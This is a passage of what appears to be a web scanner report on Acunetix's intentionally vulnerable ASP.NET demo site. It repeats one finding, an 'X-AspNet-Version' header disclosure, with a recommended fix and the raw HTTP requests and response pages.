align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 13707Response body (13707 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Evidence 2.0.50727Solution Configure the server so it will not return those headers.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2
Alert tags Alert description Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).
Other info An attacker can use this information to exploit known vulnerabilities.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 14245Response body (14245 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/pbihq93nLJJrCcGURk6iWNCIK+A==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a 